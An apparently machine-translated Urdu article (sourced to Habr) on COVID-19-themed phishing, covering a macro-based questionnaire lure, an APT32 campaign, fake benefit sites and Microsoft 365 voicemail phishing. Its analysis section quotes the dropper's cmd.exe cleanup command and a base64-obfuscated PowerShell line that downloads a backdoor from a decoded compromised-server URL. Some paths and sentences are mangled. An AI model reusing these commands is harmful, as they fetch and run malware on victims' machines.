حملہ آور COVID-19 کے موضوع سے فائدہ اٹھاتے رہتے ہیں، جو ان صارفین کے لیے زیادہ سے زیادہ خطرات پیدا کر رہے ہیں جو وبا سے متعلق ہر چیز میں گہری دلچسپی رکھتے ہیں۔ میں
میں یاد رکھیں
کیا آپ COVID-19 کا مفت ٹیسٹ چاہتے ہیں؟
کورونا وائرس پر مبنی فشنگ کی ایک اور نمایاں مثال تھی۔
میکرو کو فعال کرنے کے لیے زیادہ تر صارفین کو قائل کرنا بھی آسان تھا۔ ایسا کرنے کے لیے، ایک معیاری چال استعمال کی گئی: سوالنامے کو پُر کرنے کے لیے، آپ کو پہلے میکروز کو فعال کرنے کی ضرورت ہے، جس کا مطلب ہے کہ آپ کو VBA اسکرپٹ چلانے کی ضرورت ہے۔
جیسا کہ آپ دیکھ سکتے ہیں، VBA اسکرپٹ کو خاص طور پر اینٹی وائرس سے ماسک کیا گیا ہے۔
ونڈوز میں انتظار کی ایک خصوصیت ہے جہاں ایپلیکیشن پہلے سے طے شدہ "ہاں" جواب کو قبول کرنے سے پہلے /T <سیکنڈز> کا انتظار کرتی ہے۔ ہمارے معاملے میں، اسکرپٹ نے عارضی فائلوں کو حذف کرنے سے پہلے 65 سیکنڈ انتظار کیا:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
اور انتظار کے دوران، میلویئر ڈاؤن لوڈ ہو گیا۔ اس کے لیے ایک خصوصی پاور شیل اسکرپٹ لانچ کیا گیا تھا۔
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 ویلیو کو ڈی کوڈ کرنے کے بعد، PowerShell اسکرپٹ جرمنی سے پہلے ہیک کیے گئے ویب سرور پر موجود بیک ڈور کو ڈاؤن لوڈ کرتا ہے:
http://automatischer-staubsauger.com/feature/777777.png
اور اسے نام کے تحت محفوظ کرتا ہے:
C:UsersPublictmpdirfile1.exe
فولڈر ‘C:UsersPublictmpdir’
'tmps1.bat' فائل کو چلانے پر حذف کر دیا جاتا ہے جس میں کمانڈ ہوتی ہے۔ cmd /c mkdir ""C:UsersPublictmpdir"".
سرکاری اداروں پر ٹارگٹ حملہ
مزید برآں، FireEye تجزیہ کاروں نے حال ہی میں ووہان میں سرکاری ڈھانچے کے ساتھ ساتھ چینی وزارت برائے ایمرجنسی مینجمنٹ کو نشانہ بنایا APT32 حملے کی اطلاع دی۔ تقسیم شدہ RTFs میں سے ایک میں نیویارک ٹائمز کے ایک مضمون کا لنک تھا جس کا عنوان تھا۔
دلچسپ بات یہ ہے کہ پتہ لگانے کے وقت، وائرسٹوٹل کے مطابق، کسی بھی اینٹی وائرس نے اس مثال کا پتہ نہیں لگایا۔
جب آفیشل ویب سائٹس بند ہوں۔
فشنگ حملے کی سب سے حیران کن مثال دوسرے دن ہی روس میں پیش آئی۔ اس کی وجہ 3 سے 16 سال کی عمر کے بچوں کے لیے ایک طویل انتظار کے فائدے کی تقرری تھی۔ جب 12 مئی 2020 کو درخواستیں قبول کرنے کے آغاز کا اعلان کیا گیا تو لاکھوں افراد طویل انتظار کی مدد کے لیے اسٹیٹ سروسز کی ویب سائٹ پر پہنچ گئے اور پورٹل کو ایک پیشہ ور DDoS حملے سے بدتر نہیں لایا۔ جب صدر نے کہا کہ "سرکاری خدمات درخواستوں کے بہاؤ کا مقابلہ نہیں کر سکتیں،" لوگوں نے درخواستیں قبول کرنے کے لیے متبادل سائٹ کے آغاز کے بارے میں آن لائن بات کرنا شروع کر دی۔
مسئلہ یہ ہے کہ متعدد سائٹوں نے ایک ساتھ کام کرنا شروع کر دیا، اور جب کہ ایک، posobie16.gosuslugi.ru پر اصل میں درخواستیں قبول کرتی ہے، مزید
SearchInform کے ساتھیوں کو .ru زون میں تقریباً 30 نئے فراڈ ڈومینز ملے۔ Infosecurity and Softline Company نے اپریل کے آغاز سے اب تک اسی طرح کی 70 سے زیادہ جعلی سرکاری سروس ویب سائٹس کا سراغ لگایا ہے۔ ان کے تخلیق کار مانوس علامتوں میں ہیرا پھیری کرتے ہیں اور لفظ gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie وغیرہ کے مجموعے بھی استعمال کرتے ہیں۔
ہائپ اور سوشل انجینئرنگ
یہ تمام مثالیں صرف اس بات کی تصدیق کرتی ہیں کہ حملہ آور کامیابی کے ساتھ کورونا وائرس کے موضوع سے رقم کما رہے ہیں۔ اور جتنا زیادہ سماجی تناؤ اور زیادہ غیر واضح مسائل ہوں گے، اسکیمرز کو اہم ڈیٹا چوری کرنے، لوگوں کو اپنے پیسے دینے پر مجبور کرنے، یا مزید کمپیوٹرز کو ہیک کرنے کے امکانات اتنے ہی زیادہ ہوں گے۔
اور یہ دیکھتے ہوئے کہ وبائی مرض نے ممکنہ طور پر غیر تیار لوگوں کو گھر سے بڑے پیمانے پر کام کرنے پر مجبور کیا ہے، نہ صرف ذاتی بلکہ کارپوریٹ ڈیٹا بھی خطرے میں ہے۔ مثال کے طور پر، حال ہی میں مائیکروسافٹ 365 (سابقہ آفس 365) کے صارفین کو بھی فشنگ حملے کا نشانہ بنایا گیا۔ لوگوں کو خطوط کے منسلکات کے طور پر بڑے پیمانے پر "چھوٹ گئے" صوتی پیغامات موصول ہوئے۔ تاہم، فائلیں دراصل ایک HTML صفحہ تھیں جس نے حملے کے متاثرین کو بھیجا تھا۔
ماخذ: www.habr.com